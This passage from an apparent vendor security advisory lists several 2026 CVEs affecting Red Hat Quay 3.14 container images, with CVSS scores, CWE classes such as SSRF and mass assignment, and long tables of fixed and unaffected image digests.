Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Important

CVE-2026-42033

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Important

CVE-2026-42035

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix Workaround

Known not affected 23 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64	—	Workaround

Threats

Impact Moderate

CVE-2026-42039

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Important

CVE-2026-42041

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64		—

Threats

Impact Important

CVE-2026-42043

7.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le	—	Vendor Fix fix

Known not affected 23 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64		—
Unresolved product id: Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le		—
